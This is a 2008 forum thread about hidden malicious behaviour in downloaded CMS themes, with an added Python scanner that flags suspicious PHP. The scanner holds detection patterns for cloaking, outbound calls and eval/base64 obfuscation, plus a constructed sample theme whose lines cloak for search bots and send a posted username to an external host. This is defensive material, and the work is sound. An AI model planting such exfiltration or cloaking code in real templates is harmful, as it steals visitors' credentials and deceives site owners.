
Before You Download A Theme or Template

Discussion in 'Content Management' started by ltdraper, Jan 30, 2008.

Are there security concerns with downloaded templates?

  1. What's PHP?

    0 vote(s)
    0.0%
  2. Minor problem

    0 vote(s)
    0.0%
  3. No problem, I just read through the code

    2 vote(s)
    100.0%
  4. Yes, a huge problem

    0 vote(s)
    0.0%
  1. #1
    Do you read through the source code of themes and templates you install on your CMS? Do you feel that you can read and understand the PHP code in a template? Did you even know that themes and templates have PHP code that has complete access to your server as the Apache user?

    What if you found out that your template was doing a few of these things?

    1> Cloak your pages so that it looks normal to everyone except the search engine bots. They get shown a page of spammy links.

    2> Implement an Ajax based function that sends any form data entered (for example, login and passwords from the comments) to an external web site.

    3> Cloak your pages so that they look fine to you, but if someone enters the page from a search engine they get a different page with the evil template developer's AdSense.

    4> Watch the IP addresses that view the pages (phone home) and make a good guess as to which addresses are probably the owner. Cloak the pages so that the site owner sees their own content, but everyone else sees the template developer's content.

    I put together a list of 10 of these scenarios on my blog (Promote-my-site.com) and would be interested to see some discussion of whether people think this is a serious threat.
     
    ltdraper, Jan 30, 2008 IP
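One practical way to act on this post is to grep a downloaded theme for the building blocks of the four scenarios before installing it. The scanner below is an added example written for this thread, not code from the original post or from any template vendor; the indicator patterns and the two sample theme files are constructed for illustration, and a hit only marks a spot to read by hand.

```python
import re

# Indicator patterns, one per behaviour the post above describes. Constructed for
# this example: a hit means "read this spot by hand", not "this file is malicious".
INDICATORS = {
    # 1/3: serve different content to search-engine bots or search referrals
    "bot_cloaking": re.compile(r"HTTP_USER_AGENT[^\n]*?(googlebot|slurp|msnbot|spider|crawler)", re.I),
    "referrer_cloaking": re.compile(r"HTTP_REFERER[^\n]*?(google|yahoo|msn|live)\.", re.I),
    # 4: branch on the visitor's address (owner sees real content, others do not)
    "ip_conditional": re.compile(r"REMOTE_ADDR[^\n]*?[=!]=", re.I),
    # 2/4: outbound connection from template code (form data exfil, phone home)
    "outbound_request": re.compile(r"\b(curl_init|fsockopen|file_get_contents\s*\(\s*['\"]https?://)", re.I),
    # hidden logic: a legitimate theme has no reason to decode and execute strings
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

def scan_php(source: str) -> list[tuple[str, int, str]]:
    """Return (indicator, line_number, line) for every flagged line in one PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((name, lineno, line.strip()))
    return findings

def scan_theme(files: dict[str, str]) -> dict[str, list[tuple[str, int, str]]]:
    """Scan a mapping of path -> PHP source; keep only files with at least one hit."""
    report = {path: scan_php(src) for path, src in files.items()}
    return {path: hits for path, hits in report.items() if hits}

# Constructed sample theme files (not taken from any real template).
BENIGN_THEME = """<?php
defined('_JEXEC') or die('Restricted access');
echo '<h1>' . htmlspecialchars($this->title) . '</h1>';
"""

SUSPICIOUS_THEME = """<?php
if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) { include 'links.php'; }
if ($_SERVER['REMOTE_ADDR'] == '203.0.113.7') { $owner_view = true; }
$c = curl_init('http://example.net/collect.php?u=' . urlencode($_POST['username']));
eval(base64_decode('...'));
"""

if __name__ == "__main__":
    for path, hits in scan_theme({"index.php": SUSPICIOUS_THEME, "error.php": BENIGN_THEME}).items():
        for name, lineno, line in hits:
            print(f"{path}:{lineno} [{name}] {line}")
```

Run it over every `.php` file in the unpacked theme archive; an empty report does not prove the theme is clean, but any hit is worth reading in context before the files go anywhere near a live server.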
  2. PinkyRing
    #2
    Interesting. I just happened to check my stats and saw an IP address from Latvia accessing my site consistently. I am using a free template from Joomlart, which I had considered safe. Do you think it could be phoning home?
     
    PinkyRing, Jan 30, 2008 IP
  3. ltdraper
    #3
    That could be, although it's more likely a scraper grabbing content to then randomize and put on a splog somewhere. But one thing a theme could do is install a backdoor so that when a certain IP accesses the site they get different information, such as a list of the email addresses in jos_users.

    Or maybe you've just got a fan in Latvia.

    If you're really freaked out, PM me and we'll arrange for me to take a quick look at your template. I'd be interested to find one of these evil templates in the wild.
     
    ltdraper, Jan 30, 2008 IP
  4. PinkyRing
    #4
    What I did was block that IP; I don't really think I have fans in Latvia. Are you familiar with Joomlart? They are "recommended" by Joomla, I guess. Do you think they would risk their business by inserting a backdoor into a site?

    I'm not necessarily freaked out, but curious about this sudden amount of traffic from Latvia, so I am hoping Joomlart can be trusted.

    Thanks for the advice; if I feel there is something suspicious going on from now on, I'll PM you.

    Thanks
     
    PinkyRing, Jan 30, 2008 IP
  5. ltdraper
    #5
    No, but the possibility exists that they were hacked and somebody put a backdoor into their template. Or more likely the two have nothing to do with each other and you were just a victim of a probe.
     
    ltdraper, Jan 30, 2008 IP